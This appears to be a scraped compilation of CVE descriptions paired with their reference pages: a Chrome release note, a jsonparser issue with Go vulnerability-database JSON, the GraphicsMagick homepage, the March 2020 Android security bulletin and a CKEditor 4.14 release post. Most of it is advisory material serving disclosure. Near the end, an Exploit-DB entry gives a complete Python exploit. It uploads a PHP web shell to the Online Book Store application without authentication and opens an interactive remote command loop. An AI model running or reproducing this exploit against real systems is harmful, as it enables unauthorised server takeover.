Insufficient policy enforcement in media in Google Chrome prior to 80.0.3987.132 allowed a remote attacker to bypass same origin policy via a crafted HTML page.

**Chrome Releases**

Release updates from the Chrome team

CVE-2020-6420: Stable Channel Update for Desktop

The Library API in buger jsonparser through 2019-12-04 allows attackers to cause a denial of service (infinite loop) via a Delete call.

zengjinzheng pushed a commit to zengjinzheng/jsonparser that referenced this issue

Mar 16, 2020

zengjinzheng pushed a commit to zengjinzheng/jsonparser that referenced this issue

Mar 16, 2020

zengjinzheng pushed a commit to zengjinzheng/jsonparser that referenced this issue

Mar 17, 2020

zengjinzheng pushed a commit to zengjinzheng/jsonparser that referenced this issue

Mar 17, 2020

buger pushed a commit that referenced this issue

Mar 21, 2020

\*\*Description\*\*: This pr fix issue #188. If \`findKeyStart\` meets a \`\[\` or \`{\`, it should not add i with \`blockEnd\`’s return value directly because it may return -1 if it did not find the close symbol

naveensrinivasan added a commit to ossf/scorecard that referenced this issue

Sep 21, 2021

The github.com/buger/jsonparser has this vulnerability.

"vulns": \[
        {
          "id": "GO-2021-0089",
          "package": {
            "name": "github.com/buger/jsonparser",
            "ecosystem": "Go"
          },
          "details": "Parsing malformed JSON which contain opening brackets, but not closing brackes,\\nleads to an infinite loop. If operating on untrusted user input this can be\\nused as a denial of service vector.\\n",
          "affects": {
            "ranges": \[
              {
                "type": "SEMVER",
                "fixed": "0.0.0-20200321185410-91ac96899e49"
              }
            \]
          },
          "aliases": \[
            "CVE-2020-10675"
          \],
          "modified": "2021-04-14T12:00:00Z",
          "published": "2021-04-14T12:00:00Z",
          "ecosystem\_specific": {
            "symbols": \[
              "findKeyStart"
            \]
          },
          "database\_specific": {
            "source": "https://storage.googleapis.com/go-vulndb/github.com/buger/jsonparser.json",
            "url": "https://go.googlesource.com/vulndb/+/refs/heads/master/reports/GO-2021-0089.yaml"
          },
          "references": \[
            {
              "type": "FIX",
              "url": "buger/jsonparser#192"
            },
            {
              "type": "FIX",
              "url": "buger/jsonparser@91ac968"
            },
            {
              "type": "WEB",
              "url": "buger/jsonparser#188"
            }
          \],
          "affected": \[
            {
              "package": {
                "name": "github.com/buger/jsonparser",
                "ecosystem": "Go"
              },
              "ranges": \[
                {
                  "type": "SEMVER",
                  "events": \[
                    {
                      "introduced": "0"
                    },
                    {
                      "fixed": "0.0.0-20200321185410-91ac96899e49"
                    }
                  \]
                }
              \],
              "ecosystem\_specific": {
                "symbols": \[
                  "findKeyStart"
                \]
              },
              "database\_specific": {
                "source": "https://storage.googleapis.com/go-vulndb/github.com/buger/jsonparser.json",
                "url": "https://go.googlesource.com/vulndb/+/refs/heads/master/reports/GO-2021-0089.yaml"
              }
            }
          \]
        },
        {
          "id": "GO-2021-0057",
          "package": {
            "name": "github.com/buger/jsonparser",
            "ecosystem": "Go"
          },
          "details": "Due to improper bounds checking, maliciously crafted JSON objects\\ncan cause an out-of-bounds panic. If parsing user input, this may\\nbe used as a denial of service vector.\\n",
          "affects": {
            "ranges": \[
              {
                "type": "SEMVER",
                "fixed": "1.1.1"
              }
            \]
          },
          "aliases": \[
            "CVE-2020-35381"
          \],
          "modified": "2021-04-14T12:00:00Z",
          "published": "2021-04-14T12:00:00Z",
          "ecosystem\_specific": {
            "symbols": \[
              "searchKeys"
            \]
          },
          "database\_specific": {
            "source": "https://storage.googleapis.com/go-vulndb/github.com/buger/jsonparser.json",
            "url": "https://go.googlesource.com/vulndb/+/refs/heads/master/reports/GO-2021-0057.yaml"
          },
          "references": \[
            {
              "type": "FIX",
              "url": "buger/jsonparser#221"
            },
            {
              "type": "FIX",
              "url": "buger/jsonparser@df3ea76"
            },
            {
              "type": "WEB",
              "url": "buger/jsonparser#219"
            }
          \],
          "affected": \[
            {
              "package": {
                "name": "github.com/buger/jsonparser",
                "ecosystem": "Go"
              },
              "ranges": \[
                {
                  "type": "SEMVER",
                  "events": \[
                    {
                      "introduced": "0"
                    },
                    {
                      "fixed": "1.1.1"
                    }
                  \]
                }
              \],
              "ecosystem\_specific": {
                "symbols": \[
                  "searchKeys"
                \]
              },
              "database\_specific": {
                "url": "https://go.googlesource.com/vulndb/+/refs/heads/master/reports/GO-2021-0057.yaml",
                "source": "https://storage.googleapis.com/go-vulndb/github.com/buger/jsonparser.json"
              }
            }
          \]
        }
      \]
    }

naveensrinivasan added a commit to ossf/scorecard that referenced this issue

Sep 21, 2021

The github.com/buger/jsonparser has this vulnerability.

"vulns": \[
        {
          "id": "GO-2021-0089",
          "package": {
            "name": "github.com/buger/jsonparser",
            "ecosystem": "Go"
          },
          "details": "Parsing malformed JSON which contain opening brackets, but not closing brackes,\\nleads to an infinite loop. If operating on untrusted user input this can be\\nused as a denial of service vector.\\n",
          "affects": {
            "ranges": \[
              {
                "type": "SEMVER",
                "fixed": "0.0.0-20200321185410-91ac96899e49"
              }
            \]
          },
          "aliases": \[
            "CVE-2020-10675"
          \],
          "modified": "2021-04-14T12:00:00Z",
          "published": "2021-04-14T12:00:00Z",
          "ecosystem\_specific": {
            "symbols": \[
              "findKeyStart"
            \]
          },
          "database\_specific": {
            "source": "https://storage.googleapis.com/go-vulndb/github.com/buger/jsonparser.json",
            "url": "https://go.googlesource.com/vulndb/+/refs/heads/master/reports/GO-2021-0089.yaml"
          },
          "references": \[
            {
              "type": "FIX",
              "url": "buger/jsonparser#192"
            },
            {
              "type": "FIX",
              "url": "buger/jsonparser@91ac968"
            },
            {
              "type": "WEB",
              "url": "buger/jsonparser#188"
            }
          \],
          "affected": \[
            {
              "package": {
                "name": "github.com/buger/jsonparser",
                "ecosystem": "Go"
              },
              "ranges": \[
                {
                  "type": "SEMVER",
                  "events": \[
                    {
                      "introduced": "0"
                    },
                    {
                      "fixed": "0.0.0-20200321185410-91ac96899e49"
                    }
                  \]
                }
              \],
              "ecosystem\_specific": {
                "symbols": \[
                  "findKeyStart"
                \]
              },
              "database\_specific": {
                "source": "https://storage.googleapis.com/go-vulndb/github.com/buger/jsonparser.json",
                "url": "https://go.googlesource.com/vulndb/+/refs/heads/master/reports/GO-2021-0089.yaml"
              }
            }
          \]
        },
        {
          "id": "GO-2021-0057",
          "package": {
            "name": "github.com/buger/jsonparser",
            "ecosystem": "Go"
          },
          "details": "Due to improper bounds checking, maliciously crafted JSON objects\\ncan cause an out-of-bounds panic. If parsing user input, this may\\nbe used as a denial of service vector.\\n",
          "affects": {
            "ranges": \[
              {
                "type": "SEMVER",
                "fixed": "1.1.1"
              }
            \]
          },
          "aliases": \[
            "CVE-2020-35381"
          \],
          "modified": "2021-04-14T12:00:00Z",
          "published": "2021-04-14T12:00:00Z",
          "ecosystem\_specific": {
            "symbols": \[
              "searchKeys"
            \]
          },
          "database\_specific": {
            "source": "https://storage.googleapis.com/go-vulndb/github.com/buger/jsonparser.json",
            "url": "https://go.googlesource.com/vulndb/+/refs/heads/master/reports/GO-2021-0057.yaml"
          },
          "references": \[
            {
              "type": "FIX",
              "url": "buger/jsonparser#221"
            },
            {
              "type": "FIX",
              "url": "buger/jsonparser@df3ea76"
            },
            {
              "type": "WEB",
              "url": "buger/jsonparser#219"
            }
          \],
          "affected": \[
            {
              "package": {
                "name": "github.com/buger/jsonparser",
                "ecosystem": "Go"
              },
              "ranges": \[
                {
                  "type": "SEMVER",
                  "events": \[
                    {
                      "introduced": "0"
                    },
                    {
                      "fixed": "1.1.1"
                    }
                  \]
                }
              \],
              "ecosystem\_specific": {
                "symbols": \[
                  "searchKeys"
                \]
              },
              "database\_specific": {
                "url": "https://go.googlesource.com/vulndb/+/refs/heads/master/reports/GO-2021-0057.yaml",
                "source": "https://storage.googleapis.com/go-vulndb/github.com/buger/jsonparser.json"
              }
            }
          \]
        }
      \]
    }

CVE-2020-10675: infinite loop in Delete · Issue #188 · buger/jsonparser

In GraphicsMagick before 1.3.32, the text filename component allows remote attackers to read arbitrary files via a crafted image because of TranslateTextEx for SVG.

 

Current Release

1.3.38 (Released March 26, 2022) download release

Development Snapshots

(Updated frequently) download development snapshots

Mercurial Repository

(Updated frequently) visit Mercurial repository

Check http://www.GraphicsMagick.org/ or https://graphicsmagick.sourceforge.io/index.html for the latest version of this page.

GraphicsMagick is the swiss army knife of image processing. Comprised of 279K physical lines (according to David A. Wheeler's SLOCCount) of source code in the base package (or 1,275K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 89 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, TIFF, and WebP.

Image processing is multi-threaded using OpenMP (read about OpenMP in GraphicsMagick) so that CPU-bound tasks scale linearly as processor cores are added. OpenMP support requires compilation with GCC 4.2 (or later), or use of any C compiler supporting at least the OpenMP 2.0 specification.

GraphicsMagick is quite portable, and compiles under almost every general purpose operating system that runs on 32-bit or 64-bit CPUs. GraphicsMagick is available for virtually any Unix or Unix-like system, including Linux. It also runs under Windows Vista and later (Vista, 7, 8.X, 10), and MacOS-X.

GraphicsMagick supports huge images and has been tested with gigapixel-size images. GraphicsMagick can create new images on the fly, making it suitable for building dynamic Web applications. GraphicsMagick may be used to resize, rotate, sharpen, color reduce, or add special effects to an image and save the result in the same or different image format. Image processing operations are available from the command line, as well as through C, C++, Lua, Perl, PHP, Python, Tcl, Ruby, Windows .NET, or Windows COM programming interfaces. With some modification, language extensions for ImageMagick may be used.

GraphicsMagick is originally derived from ImageMagick 5.5.2 as of November 2002 but has been completely independent of the ImageMagick project since then. Since the fork from ImageMagick many improvements have been made (see NEWS) by many authors using an open development model but without breaking the API or utilities operation.

Here are some reasons to prefer GraphicsMagick over ImageMagick or other popular software:

> *   GM is more efficient than ImageMagick so it gets the job done faster using fewer resources.
> *   GM is much smaller and lighter than ImageMagick (3-5X smaller installation footprint).
> *   GM is used to process billions of files at the world's largest photo sites (e.g. Flickr and Etsy).
> *   GM does not conflict with other installed software.
> *   GM suffers from fewer security issues and exploits than ImageMagick.
> *   GM participates in Google's oss-fuzz project (since February, 2018).
> *   GM valgrind's 100% clean (memcheck and helgrind).
> *   GM passes rigorous memory error testing using ASan.
> *   GM passes undefined behavior testing using UBSan.
> *   GM comes with a comprehensive manual page.
> *   GM provides API and ABI stability and managed releases that you can count on (ImageMagick does not).
> *   GM provides detailed yet comprehensible ChangeLog and NEWS files (ImageMagick does not).
> *   GM is available for free, and may be used to support both open and proprietary applications.
> *   GM is distributed under an X11-style license (MIT License), approved by the Open Source Initiative, recommended for use by the OSSCC, and compatible with the GNU GPL.
> *   GM source code is managed in Mercurial, a distributed source control management tool which supports management of local changes. The repository history goes back to 1998.
> *   GM has 0.00 (zero) defects per 1000 lines of code (293,341 total lines included) according to Coverity analysis on May 25, 2015.
> *   GM developers contribute to other free projects for the public good.

GraphicsMagick is copyrighted by the GraphicsMagick Group as well as many others.

Here are just a few examples of what GraphicsMagick can do:

> *   Convert an image from one format to another (e.g. TIFF to JPEG)
> *   Resize, rotate, sharpen, color reduce, or add special effects to an image
> *   Create a montage of image thumbnails
> *   Create a transparent image suitable for use on the Web
> *   Compare two images
> *   Turn a group of images into a GIF animation sequence
> *   Create a composite image by combining several separate images
> *   Draw shapes or text on an image
> *   Decorate an image with a border or frame
> *   Describe the format and characteristics of an image

CVE-2019-12921: GraphicsMagick Image Processing System

An issue was discovered in OpenWrt 18.06.0 to 18.06.6 and 19.07.0, and LEDE 17.01.0 to 17.01.7. A bug in the fork of the opkg package manager before 2020-01-25 prevents correct parsing of embedded checksums in the signed repository index, allowing a man-in-the-middle attacker to inject arbitrary package payloads (which are installed without verification).

CVE-2020-7982: Commits · openwrt/openwrt

XSS was discovered in the RegistrationMagic plugin 4.6.0.0 for WordPress via the rm_form_id, rm_tr, or form_name parameter.

CVE-2020-8436: RegistrationMagic – Custom Registration Forms, User Registration and User Login Plugin

In binder_transaction of binder.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-145988638References: Upstream kernel

_Published March 2, 2020 | Updated March 9, 2020_

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2020-03-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.

Android partners are notified of all issues at least a month before publication. Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP.

The most severe of these issues is a critical security vulnerability in the media framework that could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.

**Android and Google service mitigations**

This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.

*   Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.
*   The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

**2020-03-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2020-03-01 patch level. Vulnerabilities are grouped under the component that they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**Framework**

The vulnerability in this section could enable a local malicious application to bypass operating system protections that isolate application data from other applications.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2020-0031

A-141703197 \[2\]

ID

High

10

**Media framework**

The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2020-0032

A-145364230

RCE

Critical

8.0, 8.1, 9, 10

CVE-2020-0033

A-144351324

EoP

High

8.0, 8.1, 9, 10

CVE-2020-0034

A-62458770

ID

High

8.0, 8.1

**System**

The most severe vulnerability in this section could enable a local malicious application to bypass user interaction requirements in order to gain access to additional permissions.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2020-0036

A-144679405

EoP

High

8.0, 8.1, 9, 10

CVE-2020-0035

A-140622024

ID

High

8.0, 8.1, 9

CVE-2020-0029

A-140065828

ID

High

10

CVE-2020-0037

A-143106535

ID

High

8.0, 8.1, 9, 10

CVE-2020-0038

A-143109193

ID

High

8.0, 8.1, 9, 10

CVE-2020-0039

A-143155861

ID

High

8.0, 8.1, 9, 10

**Google Play system updates**

The following issue is included in Project Mainline components.

 

Component

CVE

Media codecs

CVE-2020-0032

**2020-03-05 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2020-03-05 patch level. Vulnerabilities are grouped under the component they affect and include details such as the CVE, associated references, type of vulnerability, severity, component (where applicable), and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, such as the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Kernel components**

The most severe vulnerability in this section could enable a local attacker using a specially crafted USB device to execute arbitrary code within the context of a privileged process.

    

CVE

References

Type

Severity

Component

CVE-2019-19527

A-146257915  
Upstream kernel \[2\]

EoP

High

USB

CVE-2019-19537

A-146258055  
Upstream kernel

EoP

High

USB

CVE-2019-15239

A-143009752  
Upstream kernel

EoP

High

Networking

CVE-2020-0041

A-145988638  
Upstream kernel

EoP

High

Binder

**FPC components**

The most severe vulnerability in this section could enable a local malicious application to bypass user interaction requirements in order to gain access to additional permissions.

    

CVE

References

Type

Severity

Component

CVE-2020-0010

A-137014293\*

EoP

High

FPC Fingerprint TEE

CVE-2020-0011

A-137648045\*

EoP

High

FPC Fingerprint TEE

CVE-2020-0012

A-137648844\*

EoP

High

FPC Fingerprint TEE

CVE-2020-0042

A-137649599\*

ID

Moderate

FPC Fingerprint TEE

CVE-2020-0043

A-137650218\*

ID

Moderate

FPC Fingerprint TEE

CVE-2020-0044

A-137650219\*

ID

Moderate

FPC Fingerprint TEE

**MediaTek components**

    

CVE

References

Type

Severity

Component

CVE-2020-0069

A-147882143\*  
M-ALPS04356754

EoP

High

System

**Qualcomm components**

These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

    

CVE

References

Type

Severity

Component

CVE-2019-14079

A-138848422  
QC-CR#2521001

N/A

High

USB

CVE-2018-11838

A-145545090  
QC-CR#221457 \[2\]

N/A

High

WLAN

CVE-2019-10526

A-145544085  
QC-CR#2232526  
QC-CR#2541970

N/A

High

WLAN

CVE-2019-10569

A-145545820  
QC-CR#2315791

N/A

High

Audio

CVE-2019-14029

A-145546793  
QC-CR#2528795

N/A

High

Graphics

CVE-2019-14032

A-145546652  
QC-CR#2537311

N/A

High

Audio

CVE-2019-14068

A-145546435  
QC-CR#2507653 \[2\]

N/A

High

Audio

CVE-2019-14072

A-145545251  
QC-CR#2509391

N/A

High

Graphics

**Qualcomm closed-source components**

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

    

CVE

References

Type

Severity

Component

CVE-2019-2317

A-134436812\*

N/A

Critical

Closed-source component

CVE-2019-10586

A-140423909\*

N/A

Critical

Closed-source component

CVE-2019-10587

A-140423816\*

N/A

Critical

Closed-source component

CVE-2019-10593

A-140424165\*

N/A

Critical

Closed-source component

CVE-2019-10594

A-140424564\*

N/A

Critical

Closed-source component

CVE-2019-10612

A-140423161\*

N/A

Critical

Closed-source component

CVE-2019-14031

A-142271912\*

N/A

Critical

Closed-source component

CVE-2019-14045

A-140973418\*

N/A

Critical

Closed-source component

CVE-2019-14071

A-145545489\*

N/A

Critical

Closed-source component

CVE-2019-14083

A-140973259\*

N/A

Critical

Closed-source component

CVE-2019-14086

A-140973417\*

N/A

Critical

Closed-source component

CVE-2019-14030

A-145546515\*

N/A

Critical

Closed-source component

CVE-2019-14097

A-145546003\*

N/A

Critical

Closed-source component

CVE-2019-14098

A-145546314\*

N/A

Critical

Closed-source component

CVE-2019-10546

A-145545250\*

N/A

Critical

Closed-source component

CVE-2019-14095

A-142843397\*

N/A

Critical

Closed-source component

CVE-2018-11970

A-114042111\*

N/A

High

Closed-source component

CVE-2019-10603

A-140424074\*

N/A

High

Closed-source component

CVE-2019-10616

A-140423338\*

N/A

High

Closed-source component

CVE-2019-10549

A-140423162\*

N/A

High

Closed-source component

CVE-2019-10550

A-140423702\*

N/A

High

Closed-source component

CVE-2019-10552

A-140423817\*

N/A

High

Closed-source component

CVE-2019-10553

A-140423081\*

N/A

High

Closed-source component

CVE-2019-10554

A-140424012\*

N/A

High

Closed-source component

CVE-2019-10577

A-140424166\*

N/A

High

Closed-source component

CVE-2019-14026

A-142271986\*

N/A

High

Closed-source component

CVE-2019-14027

A-142271756\*

N/A

High

Closed-source component

CVE-2019-14028

A-142271831\*

N/A

High

Closed-source component

CVE-2019-2300

A-142271659\*

N/A

High

Closed-source component

CVE-2019-2311

A-142271967\*

N/A

High

Closed-source component

CVE-2019-14050

A-143902706\*

N/A

High

Closed-source component

CVE-2019-14081

A-143902882\*

N/A

High

Closed-source component

CVE-2019-14082

A-140974589\*

N/A

High

Closed-source component

CVE-2019-14085

A-143902807\*

N/A

High

Closed-source component

CVE-2019-14048

A-145545282\*

N/A

High

Closed-source component

CVE-2019-14061

A-145545758\*

N/A

High

Closed-source component

CVE-2019-10604

A-145545725\*

N/A

High

Closed-source component

CVE-2019-10591

A-145545283\*

N/A

High

Closed-source component

CVE-2019-14000

A-145546434\*

N/A

High

Closed-source component

CVE-2019-14015

A-145545650\*

N/A

High

Closed-source component

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, see Check and update your Android version.

*   Security patch levels of 2020-03-01 or later address all issues associated with the 2020-03-01 security patch level.
*   Security patch levels of 2020-03-05 or later address all issues associated with the 2020-03-05 security patch level and all previous patch levels.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2020-03-01\]
*   \[ro.build.version.security\_patch\]:\[2020-03-05\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2020-03-01 security patch level. Please see this article for more details on how to install security updates.

**2\. Why does this bulletin have two security patch levels?**

This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.

*   Devices that use the 2020-03-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
*   Devices that use the security patch level of 2020-03-05 or newer must include all applicable patches in this (and previous) security bulletins.

Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

**3\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**4\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

**5\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the Android bug ID in the _References_ column. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**6\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.0

March 2, 2020

Bulletin published

1.1

March 3, 2020

Bulletin revised to include AOSP links

1.2

March 9, 2020

Updated issue list

CVE-2020-0041: Android Security Bulletin—March 2020  |  Android Open Source Project

In vp8_decode_frame of decodeframe.c, there is a possible out of bounds read due to improper input validation. This could lead to remote information disclosure if error correction were turned on, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1Android ID: A-62458770

CVE-2020-0034: Android Security Bulletin—March 2020  |  Android Open Source Project

A cross-site scripting (XSS) vulnerability in the WSC plugin through 5.5.7.5 for CKEditor 4 allows remote attackers to run arbitrary web script inside an IFRAME element by injecting a crafted HTML element into the editor.

 by  &  . Posted on 2020-03-05

We are happy to announce the release of CKEditor 4.14 that contains new features, bug fixes, and API improvements. Most notably, this WYSIWYG editor version introduces support for pasting from LibreOffice. It also includes security fixes for the HTML data processor and the WebSpellChecker Dialog plugin, so an upgrade is highly recommended.

**# Paste from LibreOffice Writer**

CKEditor 4 is famous for its best-in-class support for pasting content from Word, Excel and Google Docs. The Paste from LibreOffice plugin lets you copy your content from LibreOffice Writer, clean up the resulting source HTML, and add it to your WYSIWYG editor content. What is extremely important, though, is that CKEditor 4 lets you preserve the author’s intentions by retaining the original structure and formatting, and adjusting it to the styles you are using in your editor.

 CKEditor 4 WYSIWYG editor with support for pasting from LibreOffice.

You can read more about this feature in the documentation and try out the Paste from LibreOffice sample. This feature is available by default in the Standard and Full editor presets.

**# Security issues fixed**

CKEditor 4.14 fixes an XSS vulnerability in the HTML data processor reported by Michał Bentkowski of Securitum. The vulnerability stemmed from the fact that it was possible to execute XSS inside CKEditor after persuading the victim to: (i) switch CKEditor to source mode, then (ii) paste a specially crafted HTML code, prepared by the attacker, into the opened CKEditor source area, and (iii) switch back to WYSIWYG mode or (i) copy the specially crafted HTML code, prepared by the attacker and (ii) paste it into CKEditor in WYSIWYG mode. Although this is an unlikely scenario, we recommend upgrading to the latest editor version.

This editor release also fixes an XSS vulnerability in the third-party WebSpellChecker Dialog plugin that is included in the Standard and Full presets of CKEditor 4. The vulnerability was reported by Pham Van Khanh from Viettel Cyber Security and was present in plugin versions up to 5.5.7.5. It is related to the specific internals of the plugin, where it was possible to execute XSS after persuading the victim to: (i) switch CKEditor to source mode, then (ii) paste a specially crafted HTML code, prepared by the attacker, into the opened CKEditor source area, then (iii) switch back to WYSIWYG mode, and (iv) preview the CKEditor content outside of the CKEditor editable area on a page where the WebSpellChecker Dialog plugin files are available. Please note that this is a highly unlikely scenario as it requires a few very specific conditions to be present. Still, upgrading to the latest CKEditor 4 version is recommended.

**# Print and preview improvements**

If you rely on writing your documents in CKEditor 4 and then printing them, you will be happy to learn that we have significantly improved this aspect of the editor functionality. We have recently noticed that some of the fake objects that are used in the WYSIWYG editor to symbolize various rich content elements, such as page breaks, anchors or iframe placeholders, were actually output in the print in their symbolic form. We have thus revamped the Preview and Print plugins to fix this and to make them much more useful.

We are happy to share that thanks to the new implementation you will also be able to add the print functionality to inline editors!

**# Other improvements**

Here are some other important enhancements that were added in this release:

*   The active dialog tab now has the aria-selected="true" attribute to improve accessibility.
*   The color button state was improved to reflect the selected editor content color.
*   The Font plugin no longer creates nested <span> elements when reapplying the same font multiple times.
*   The emoji suggestion box now shows the matched emoji name instead of the ID.
*   We introduced significant Widget plugin improvements related to selection containing multiple widgets and widget partial selection in the context of copy-paste and drag&drop operations. This change positively affects all widget-based plugins, including Easy Image, Enhanced Image, Media Embed and Code Snippet.

**# WYSIWYG editor Vue.js integration**

We are also happy to report that the beta release of the official CKEditor 4 WYSIWYG editor Vue.js integration has recently been published. You can read more about it the documentation as well as try out some samples.

This integration complements similar CKEditor 4 WYSIWYG editor integrations for React and Angular. We are looking forward to hearing what other frameworks we should support with a native CKEditor 4 WYSIWYG editor integration.

 **# API changes and improvements**

Based on community feedback and best practices in web development, we always try to modernize the CKEditor 4 API to make working with it a pleasure for any developer. As a result, in this release, we have introduced some API improvements:

*   Introduced the CKEDITOR.ui.richCombo.select() method allowing for easy control of rich combo editor toolbar elements.
*   Introduced the textColor and bgColor editor commands in the Color Button plugin that allow for applying the selected color for the current editor selection.
*   Introduced the font and fontSize editor commands in the Font plugin that allow for applying the selected font style for the current editor selection.
*   Introduced the editor.getSelectedRanges() alias for smoother work with the editor selection API.
*   Introduced an API for dynamically refreshing widget mask and parts properties, allowing for an easier integration with widgets with dynamic content.

**# Release notes**

Check out the release notes and contact us for more information.

**# Download**

Download CKEditor now and upgrade your installation or use your favorite package manager to install it!

**# License**

CKEditor is available under Open Source and Commercial licenses. Full details can be found on our license page.

**# Reporting issues and contributing**

Please report any new issues in the CKEditor 4 development repository and follow the instructions in the issue template. You can also contribute code and provide editor patches through pull requests.

**# Support**

Community support is available through Stack Overflow. Visit the resources page for additional options.

CVE-2020-9440: CKEditor 4.14 with Paste from LibreOffice released

An unauthenticated file upload vulnerability has been identified in admin_add.php in PHPGurukul Online Book Store 1.0. The vulnerability could be exploited by an unauthenticated remote attacker to upload content to the server, including PHP files, which could result in command execution.

    # Exploit Title: Online Book Store 1.0 - Unauthenticated Remote Code Execution
    # Google Dork: N/A
    # Date: 2020-01-07
    # Exploit Author: Tib3rius
    # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
    # Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
    # Version: 1.0
    # Tested on: Ubuntu 16.04
    # CVE: N/A
    
    import argparse
    import random
    import requests
    import string
    import sys
    
    parser = argparse.ArgumentParser()
    parser.add_argument('url', action='store', help='The URL of the target.')
    args = parser.parse_args()
    
    url = args.url.rstrip('/')
    random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))
    
    payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>'
    
    file = {'image': (random_file + '.php', payload, 'text/php')}
    print('> Attempting to upload PHP web shell...')
    r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
    print('> Verifying shell upload...')
    r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)
    
    if random_file in r.text:
        print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php')
        print('> Example command usage: ' + url + '/bootstrap/img/' + random_file + '.php?cmd=whoami')
        launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
        if launch_shell.lower() == 'y':
            while True:
                cmd = str(input('RCE $ '))
                if cmd == 'exit':
                    sys.exit(0)
                r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':cmd}, verify=False)
                print(r.text)
    else:
        if r.status_code == 200:
            print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
        else:
            print('> Web shell failed to upload! The web server may not have write permissions.')

CVE-2020-10224: OffSec’s Exploit Database Archive

A cross-site scripting (XSS) vulnerability in the HTML Data Processor for CKEditor 4.0 before 4.14 allows remote attackers to inject arbitrary web script through a crafted "protected" comment (with the cke_protected syntax).

**CKEditor 4 - Smart WYSIWYG HTML editor **

  

 

A highly configurable WYSIWYG HTML editor with hundreds of features, from creating rich text content with captioned images, videos, tables, media embeds, emoji or mentions to pasting from Word and Google Docs and drag&drop image upload.

Supports a broad range of browsers, including legacy ones.

**Getting started****Using npm package**

npm install --save ckeditor

Use it on your website:

<div id\="editor"\>
    <p\>This is the editor content.</p\>
</div\>
<script src\="./node\_modules/ckeditor/ckeditor.js"\></script\>
<script\>
    CKEDITOR.replace( 'editor' );
</script\>

**Using CDN**

Load the CKEditor 4 script from CDN:

<div id\="editor"\>
